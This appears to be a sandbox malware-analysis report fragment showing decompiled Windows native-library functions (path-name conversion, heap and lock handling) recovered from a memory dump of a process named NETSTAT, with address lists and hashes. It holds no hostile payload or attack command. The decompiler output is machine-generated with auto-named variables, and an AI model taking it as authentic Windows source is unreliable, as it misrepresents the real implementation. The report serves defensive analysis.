				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E02E9F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E02E86E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L02E84620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E02E86E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M02E845F8))) {
												case 0:
													_v568 = 0x2e41078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x2e411c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L02E84620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E02EAF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E02EAF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E02E652A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E02E7EB70(1, 0x2f579a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E02E7AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E02EA95D0();
																			L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E02EAB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E02EA3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E02EAB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x02e84128
0x02e84135
0x02e8413c
0x02e84141
0x02e84145
0x02e84147
0x02e8414e
0x02e84151
0x02e84159
0x02e8415c
0x02e84160
0x02e84164
0x02e84168
0x02e8416c
0x02e8417f
0x02e84181
0x02e8446a
0x02e8446a
0x02e8418c
0x02e84195
0x02e84199
0x02e84432
0x02e84439
0x02e8443d
0x02e84442
0x02e84447
0x00000000
0x02e8419f
0x02e841a3
0x02e841b1
0x02e841b9
0x02e841bd
0x02e845db
0x02e845db
0x00000000
0x02e841c3
0x02e841c3
0x02e841ce
0x02e841d4
0x02ece138
0x02ece13e
0x02ece169
0x02ece16d
0x02ece19e
0x02ece16f
0x02ece16f
0x02ece175
0x02ece179
0x02ece18f
0x02ece193
0x00000000
0x02ece199
0x00000000
0x02ece199
0x02ece193
0x00000000
0x00000000
0x00000000
0x02e841da
0x02e841da
0x02e841df
0x02e841e4
0x02e841ec
0x02e84203
0x02e84207
0x02ece1fd
0x02e84222
0x02e84226
0x02ece1f3
0x02ece1f3
0x02e8422c
0x02e8422c
0x02e84233
0x02ece1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x02e84239
0x02e84239
0x02e84239
0x02e84239
0x02e84233
0x02e84226
0x02e841ee
0x02e841ee
0x02e841f4
0x02e84575
0x02ece1b1
0x02ece1b1
0x00000000
0x02e8457b
0x02e8457b
0x02e84582
0x02ece1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x02e84588
0x02e84588
0x02e8458c
0x02ece1c4
0x02ece1c4
0x00000000
0x02e84592
0x02e84592
0x02e84599
0x02ece1be
0x00000000
0x00000000
0x00000000
0x00000000
0x02e8459f
0x02e8459f
0x02e845a3
0x02ece1d7
0x02ece1e4
0x00000000
0x02e845a9
0x02e845a9
0x02e845b0
0x02ece1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x02e845b6
0x02e845b6
0x02e845b6
0x00000000
0x02e845b6
0x02e845b0
0x02e845a3
0x02e84599
0x02e8458c
0x02e84582
0x00000000
0x00000000
0x00000000
0x00000000
0x02e841f4
0x02e8423e
0x02e84241
0x02e845c0
0x02e845c4
0x00000000
0x02e845ca
0x02e845ca
0x00000000
0x02ece207
0x02ece20f
0x00000000
0x00000000
0x00000000
0x00000000
0x02e845d1
0x00000000
0x00000000
0x02e845ca
0x00000000
0x02e84247
0x02e84247
0x02e84247
0x02e84249
0x02e84249
0x02e84249
0x02e84251
0x02e84251
0x02e84257
0x02e8425f
0x02e8426e
0x02e84270
0x02e8427a
0x02ece219
0x02ece219
0x02e84280
0x02e84282
0x02e84456
0x02e845ea
0x00000000
0x02e845f0
0x02ece223
0x00000000
0x02ece223
0x02e8445c
0x02e8445c
0x00000000
0x02e8445c
0x00000000
0x02e84288
0x02e8428c
0x02ece298
0x02e84292
0x02e84292
0x02e8429e
0x02e842a3
0x02e842a7
0x02e842ac
0x02ece22d
0x02e842b2
0x02e842b2
0x02e842b9
0x02e842bc
0x02e842c2
0x02e842ca
0x02e842cd
0x02e842cd
0x02e842d4
0x02e8433f
0x02e8433f
0x02e842d6
0x02e842d6
0x02e842d9
0x02e842dd
0x02e842eb
0x02ece23a
0x02e842f1
0x02e84305
0x02e8430d
0x02e84315
0x02e84318
0x02e8431f
0x02e84322
0x02e8432e
0x02e8433b
0x02e8433b
0x00000000
0x02e8432e
0x02e842eb
0x02e8434c
0x02e8434e
0x02e84352
0x02e84359
0x02e8435e
0x02e84361
0x02e8436e
0x02e8438a
0x02e8438e
0x02e84396
0x02e8439e
0x02e843a1
0x02e843ad
0x02e843bb
0x02e843bb
0x02e843ad
0x02e8436e
0x02e843bf
0x02e843c5
0x02e84463
0x02e84463
0x02e843ce
0x02e843d5
0x02e843d9
0x02e843df
0x02e84475
0x02e84479
0x02e84491
0x02e84491
0x02e84479
0x02e843e5
0x02e843eb
0x02e843f4
0x02e843f6
0x02e843f9
0x02e843fc
0x02e843ff
0x02e844e8
0x02e844ed
0x02e844f3
0x02ece247
0x00000000
0x02e844f9
0x02e84504
0x02e84508
0x02e8450f
0x02ece269
0x00000000
0x02e84515
0x02e84519
0x02e84531
0x02e84534
0x02e84537
0x02e8453e
0x02e84541
0x02e8454a
0x02ece255
0x02ece255
0x02ece25b
0x02ece25e
0x02ece261
0x02ece261
0x02e84555
0x02e84559
0x02e8455d
0x02ece26d
0x02ece270
0x02ece274
0x02ece27a
0x02ece27d
0x02ece28e
0x02ece28e
0x02e84563
0x02e84563
0x02e84569
0x02e84569
0x00000000
0x02e8455d
0x02e8450f
0x00000000
0x02e844f3
0x02e843ff
0x02e84405
0x02e84405
0x02e84405
0x02e842ac
0x02e8428c
0x02e84282
0x02e84407
0x02e8440d
0x02ece2af
0x02ece2af
0x02e84413
0x02e84413
0x00000000
0x02e841d4
0x00000000
0x02e841c3
0x02e841bd
0x02e84415
0x02e84415
0x02e84416
0x02e84417
0x02e84429
0x02e8416e
0x02e8416e
0x02e84175
0x02e84498
0x02e8449f
0x02ece12d
0x00000000
0x02ece133
0x00000000
0x02ece133
0x02e844a5
0x02e844a5
0x02e844aa
0x00000000
0x02e844bb
0x02e844ca
0x02e844d6
0x02e844d7
0x02e844d8
0x02e844e3
0x02e844e3
0x02e844aa
0x02e8417b
0x02e8417b
0x02e8417b
0x00000000
0x02e8417b
0x02e84175
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2776c1bcea688b14afd19ddfd30918fe3d40759f5a2f209826bc22ef621427fc
Instruction ID: 4a2016d166f4b9f3b6a73ba97318d6ec94548338b910bd8e01b8b47e188bf4f6
Opcode Fuzzy Hash: 2776c1bcea688b14afd19ddfd30918fe3d40759f5a2f209826bc22ef621427fc
Instruction Fuzzy Hash: 5EF16F705482128BC728DF59C580A7AB7E1FF88758F14A92EF4CDCB290E734D991CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02E920A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02E920A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x2f58714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E02E92EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E02E92EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E02E658EC(_t240);
									_t221 =  *0x2f55cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x2f55cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E02EA4A2C(0x2f56e40, 0x2ea4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E02E87D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x2e45c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E02E9F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E02E9F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E02EE7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L02E82400(_t267 + 0x20);
															}
															L02E82400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E02E92397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E02E82280(_t134, 0x2f58608);
									__eflags =  *0x2f56e48 - _t253; // 0x3f8820
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E02E7FFB0(_t198, _t241, 0x2f58608);
										__eflags = _t253;
										if(_t253 != 0) {
											L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x2f56e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x2f58608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E02E96B90(_t210,  &_v64);
										_t262 =  *0x2f58608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E02E9E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E02EA97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E02EA006A(0x2f58608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x2f58608);
												E02EAB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x2f56904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x2f56e48; // 0x3f8820
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E02E7FFB0(_t198, _t240, 0x2f58608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E02EA00C2(0x2f58608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x8
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x02e920a0
0x02e920a8
0x02e920ad
0x02e920b3
0x02e920b8
0x02e920c2
0x02e920c7
0x02e920cb
0x02e920d2
0x02e92263
0x02e92266
0x02ed5836
0x02ed5836
0x00000000
0x02e9226c
0x02e9226c
0x02e92270
0x02e92274
0x02e920e2
0x02e920e2
0x02e920e6
0x02e920ee
0x02ed57dc
0x02ed57de
0x02ed57ec
0x02ed57ec
0x02ed57f1
0x02ed57f3
0x02ed57f8
0x00000000
0x02ed57f8
0x02ed57e0
0x02ed57e4
0x02ed57ea
0x00000000
0x00000000
0x00000000
0x02ed57ea
0x02e920f4
0x02e920f4
0x02e920f8
0x02e920f8
0x02e920fc
0x02e92100
0x02e92106
0x02e92201
0x02e92206
0x02e9220b
0x02e9220e
0x02e922a9
0x02e922ac
0x00000000
0x00000000
0x02e922b2
0x02e922b5
0x02ed5801
0x02ed5806
0x00000000
0x00000000
0x02ed5810
0x02ed5815
0x02ed5818
0x00000000
0x00000000
0x02ed581e
0x02e922bb
0x02e922bb
0x02e92218
0x02e92218
0x02e9221c
0x02e92220
0x02e92222
0x02e922c2
0x02e922c4
0x02e922dc
0x02e922dc
0x02e922e1
0x00000000
0x00000000
0x00000000
0x02e922e7
0x02e922c8
0x02e922cd
0x02e922d3
0x02e922d6
0x02ed5823
0x02ed5825
0x02ed5827
0x00000000
0x00000000
0x02ed582d
0x00000000
0x02ed582d
0x00000000
0x02e92228
0x02e92228
0x00000000
0x02e92228
0x02e92222
0x02e92214
0x02e92214
0x00000000
0x02e92114
0x02e92114
0x02e92114
0x02e9211a
0x02e9211c
0x02e92348
0x02e9234d
0x02ed5840
0x02ed5845
0x02ed5848
0x02ed584e
0x02ed584e
0x02ed5848
0x02e92353
0x02e92355
0x02e92388
0x02e92388
0x02e92368
0x02e9236a
0x02e9236c
0x02e9238f
0x00000000
0x02e9236e
0x02e9236e
0x02e9218e
0x02e9218e
0x02e92191
0x02e92195
0x02ed5a03
0x02ed5a06
0x02ed5a0c
0x02ed5a0f
0x02ed5a11
0x02ed5a13
0x02ed5a13
0x02ed5a19
0x02ed5a1f
0x00000000
0x02e9219b
0x02e9219b
0x02e921a0
0x02e92282
0x02e92284
0x02e92284
